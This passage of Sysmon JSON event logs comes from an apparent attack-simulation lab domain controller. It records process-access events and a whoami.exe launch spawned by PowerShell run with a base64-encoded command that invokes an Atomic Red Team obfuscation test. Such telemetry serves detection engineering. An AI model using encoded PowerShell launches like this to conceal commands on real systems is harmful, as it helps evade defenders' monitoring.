C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5180,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-001044BF0900}\r\nSourceProcessId: 4892\r\nSourceThreadId: 4592\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-032B-5F25-0000-001046010A00}\r\nTargetProcessId: 3820\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-001044BF0900}","SourceProcessId":"4892","SourceThreadId":"4592","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032B-5F25-0000-001046010A00}","TargetProcessId":"3820","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5181,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.793\r\nProcessGuid: {A837DB8D-032B-5F25-0000-001069020A00}\r\nProcessId: 4112\r\nImage: C:\\Windows\\System32\\whoami.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: whoami - displays logged on user information\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: whoami.exe\r\nCommandLine: \"C:\\Windows\\system32\\whoami.exe\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032A-5F25-0000-002094BE0900}\r\nLogonId: 0x9BE94\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9\r\nParentProcessGuid: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nParentProcessId: 3064\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.793","ProcessGuid":"{A837DB8D-032B-5F25-0000-001069020A00}","Image":"C:\\Windows\\System32\\whoami.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"whoami - displays logged on user information","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"whoami.exe","CommandLine":"\"C:\\Windows\\system32\\whoami.exe\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032A-5F25-0000-002094BE0900}","LogonId":"0x9be94","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9","ParentProcessGuid":"{A837DB8D-032B-5F25-0000-0010D8E70900}","ParentProcessId":"3064","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5182,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-032B-5F25-0000-0010D8E70900}\r\nSourceProcessId: 3064\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0326-5F25-0000-0010EEE40700}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47f9c4bb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d595|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d266|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47eee67b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+473fddfc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4745c2cb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f7c1|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47431746|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743dc79|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d815|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d595|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d266|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47eee67b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+473fddfc","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-032B-5F25-0000-0010D8E70900}","SourceProcessId":"3064","SourceThreadId":"5088","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0326-5F25-0000-0010EEE40700}","TargetProcessId":"4112","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47f9c4bb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d595|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d266|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47eee67b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+473fddfc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4745c2cb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f930|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743f7c1|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47431746|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743dc79|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d815|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d595|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+4743d266|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+47eee67b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+473fddfc","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5183,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0326-5F25-0000-0010EEE40700}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0326-5F25-0000-0010EEE40700}","TargetProcessId":"4112","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5184,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5185,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.781\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.781","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
